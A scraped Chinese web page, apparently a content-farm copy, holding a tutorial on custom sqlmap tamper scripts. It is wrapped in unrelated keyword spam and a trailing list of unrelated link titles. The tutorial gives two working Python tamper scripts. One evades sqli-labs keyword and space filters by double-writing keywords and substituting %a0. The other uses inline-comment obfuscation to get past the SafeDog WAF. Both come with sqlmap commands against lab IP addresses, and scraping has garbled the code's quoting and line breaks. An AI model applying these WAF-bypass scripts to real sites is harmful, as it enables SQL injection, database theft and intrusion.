当前位置: 首页 > news >正文

网站建设验收书深圳网站的公司

网站建设验收书,深圳网站的公司,企业融资的10种方法,wordpress的分类目录文章目录 tamper脚本是什么#xff1f;指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么#xff1f; SQLMap 是一款SQL注入神器#xff0c;可以通过tamper 对注入payload 进行编码和变形#xff0c;以达到绕过某些限制的目的。但是有些时候#xff0c;SQLM… 文章目录 tamper脚本是什么指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么 SQLMap 是一款SQL注入神器可以通过tamper 对注入payload 进行编码和变形以达到绕过某些限制的目的。但是有些时候SQLMap 自带的Tamper 脚本并不是特别好用需要根据实际情况定制Tamper 脚本。 sqlmap的编写语言也是pythontamper脚本能增强sqlmap的功能达到绕过检测的目的。 指定tamper脚本运行sqlmap 在kali中用下面命令查找sqlmap所在的目录 find / -name sqlmap如图查找成功 下面是一个简单的tamper脚本它将关键字#、and、or和空格都做了替换and、or双写大小写绕过加上(?i)忽略大小写以sqli-labs第26关为例经过测试这关会过滤空格and、or和空格需要做双写和大小写绕过 import refrom lib.core.enums import PRIORITY__priority__ PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):space %a0and anANDd-- and 1or oORrpayload re.sub(r(?i)#, and 1,payload)payload re.sub(r(?i)and,anANDd,payload)payload re.sub(r(?i)or,oORr,payload)payload re.sub(r(?i)\ ,%a0,payload)return payload将这段代码放入一个sqli-labs_26.py中并将文件放到sqlmap所在的目录 运行xampp打开sqli-labs_26复制路径 然后在kali中输入下面命令运行sqlmap -tamper指定运行的tamper脚本 –current-db列出当前数据库 -u指定url -v 指定sqlmap的回显等级 –dbs 列出所有的数据库 python3 sqlmap -u http://10.9.75.164/sqli-labs/Less-26/?id2 -v3 -tamper sqli-labs_26.py --current-db如下图获取到数据库的名称为security类型为联合查询 安全狗绕过tamper脚本 绕过安全狗 1.脏数据 2.大小写转换 3.双写 4.内联注释 安装安全狗以sqli-labs第1关为例绕过安全狗应该从上面4个方面考虑经过测试只有第四个方法可行下面是一个内联注释的脚本 import refrom lib.core.enums import PRIORITY__priority__ PRIORITY.HIGHESTdef dependencies(): passdef tamper(payload, **kwargs): payload re.sub(r(?i)and, /*!14400and*/, payload)payload re.sub(r(?i)order by, /**/order/*/%0a*a*/by/**/, payload)payload re.sub(r(?i)union select, union/*!88888cas*//*/%0a*a*/select/**/, payload) payload re.sub(r(?i)union all select, union/*!88888cas*//*/%0a*a*/select/**/, payload)payload re.sub(r(?i)from information_schema.schemata, /*!from--%0f/*%0ainformation_schema.schemata*/, payload)payload re.sub(r(?i)from information_schema.tables, /*!from--%0f/*%0ainformation_schema.tables*/, payload)payload re.sub(r(?i)from information_schema.columns, /*!from--%0f/*%0ainformation_schema.columns*/, payload)payload re.sub(r(?i)database\(\), database(/*!/*/**%0fAJEST*/*/), payload)#payload re.sub(r(?i)count\(*\),count(1),payload)payload re.sub(r(?i) as,/*!14400as*/,payload)payload re.sub(r(?i)char,/*!14400char*/,payload)return payload和之前获取数据库名称一样将该脚本文件放到sqlmap所在目录下: 然后用下面命令运行sqlmap获取数据库名称 python3 sqlmap -u http://10.9.75.116/sqli-labs/Less-1/?id1 -v3 --tamper safedog.py --random-agent --dbs如图用该脚本文件做tamper绕过安全狗绕waf成功获得数据库名称
http://www.hkea.cn/news/14319417/

相关文章:

  • Wordpress也seo实训思考与总结
  • 中明建投建设集团 网站怎么做一个免费网站
  • 怎么给自己的网站做排名怎样建立公众号
  • 网站建站案例蔚县做网站
  • 网站建设丨找王科杰专业58同城推广
  • 影响网站排名重要因素python浪漫星空代码
  • 做网站p图工具东莞市网络seo推广哪家好
  • 做投票的网站赚钱嘛做网站ui设计多少钱
  • 杭州网络科技网站wordpress通栏图片插件
  • 计算机网站开发是什么专业阿里云网站备案拍照点
  • 做一家视频网站吗wordpress侧边栏字体修改
  • 网站建设相关标准网站建设福州最好
  • 效果好企业营销型网站建设公司wms仓储管理系统
  • 网站制作中的更多怎么做吉林网站优化
  • 博客系统做网站软装设计公司介绍
  • 免费网站的平台展展示型网站开发
  • 网站建设方案说明书福州云建站模版
  • 电影网站开发与设计上海金融网站建设
  • 如何降低网站相似度网站所有者是什么意思
  • 即墨医院网站制作公司公司做网站应记入哪个会计科目
  • 建筑业招聘网站百度企业网站建设
  • 大气网站源码上海中学排名
  • 游戏怎么做充值网站用新浪云做网站
  • 数据库里建设好的网站为什么外网进不去网站江苏有哪些做网站建设的公司
  • 网站设计与开发培训佛山网页设计师
  • 杭州网站建设方案优化网站建网站建设设
  • 合肥做网站大概多少钱南宁seo推广经验
  • 南充外贸网站建设网站建设的税率
  • 网站收录怎么删公司变更名字需要什么手续
  • 网站自动弹窗代码莱芜在线论坛莱芜一中李念学